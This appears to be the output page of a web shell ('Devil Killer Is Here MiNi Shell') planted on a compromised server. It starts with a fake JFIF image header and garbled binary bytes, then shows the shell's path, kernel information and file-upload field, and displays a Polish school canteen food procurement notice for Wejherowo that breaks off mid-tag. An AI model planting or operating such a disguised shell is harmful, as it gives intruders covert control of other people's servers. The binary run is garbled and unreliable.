JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251121/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251121/0054933901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ ZESPOŁU SZKOLNO-PRZEDSZKOLNEGO NR 2 W WEJHEROWIE NA 2026 ROK Z PODZIAŁEM NA CZĘŚCI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkolno - Przedszkolny nr 2</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 384045769</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nanicka 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wejherowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">586721715</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zs3@zs3.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">osemka.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ ZESPOŁU SZKOLNO-PRZEDSZKOLNEGO NR 2 W WEJHEROWIE NA 2026 ROK Z PODZIAŁEM NA CZĘŚCI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1363e5d1-4405-4b94-b55e-b0c37e877c57</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00549339</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1363e5d1-4405-4b94-b55e-b0c37e877c57 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami, odbywa się elektronicznie za pośrednictwem Platformy<br/>znajdującej się pod adresem https://ezamowienia.gov.pl/pl/<br/>2. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w<br/>zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert dostępnej pod adresem: https://ezamowienia.gov.pl/pl/<br/>3. Adres strony internetowej na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia<br/>bezpośrednio związane z postępowaniem o udzielenie zamówienia: platforma zakupowa Zamawiającego:<br/>https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Klauzula informacyjna z art. 13 RODO do zastosowania przez zamawiających w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>2. W związku z rozpoczęciem obowiązywania od dnia 25 maja 2018 r. rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. L<br/>119 z 04.05.2016), dalej „RODO”, informuję, że:<br/>▪ administratorem Pani/Pana danych osobowych jest Zespół Szkolno-Przedszkolny nr 2 w Wejherowie<br/>▪ inspektorem ochrony danych osobowych w Zespole Szkolno-Przedszkolnym nr 2 w Wejherowie jest Pan/Pani Dorota Syldatk ul. 12<br/>Marca 195,Wejherowo, e-mail: iod@um.wejherowo.pl, tel.: 58 677 71 37<br/>▪ Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji pn. ZAKUP I DOSTAWA ARTYKUŁÓW<br/>ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ ZESPOŁU SZKOLNO-PRZEDSZKOLNEGO NR 2 W WEJHEROWIE<br/>NA 2026 ROK Z PODZIAŁEM NA CZĘŚCI<br/>▪ Pani/Pana dane mogą zostać przekazane osobom lub podmiotom, którym udostępniona zostanie dokumentacja postępowania,<br/>dostawcom usługi IT w zakresie obsługi systemu informatycznego, podmiotom świadczącym usługi pocztowe, kurierom, osobom<br/>występującym z zapytaniem o udzielenie informacji publicznej, instytucjom prowadzącym postępowania kontrolne.<br/>▪ Pani/Pana dane osobowe będą przechowywane do momentu wygaśnięcia obowiązku ich przechowywania wynikającego z<br/>przepisów prawa.<br/>▪ Przysługuje Pani/Panu prawo do dostępu do swoich danych osobowych, prawo żądania ich sprostowania i ograniczenia<br/>przetwarzania z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO.<br/>▪ Przysługuje Pani/Panu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>▪ Nie przysługuje Pani/Panu:<br/>o w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo usunięcia danych osobowych;<br/>o prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>o na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawa prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. I lit. c RODO.<br/>o na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSP2.262.01.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">10</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jaja </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Produkty suche, przyprawy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mięso, wędliny </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 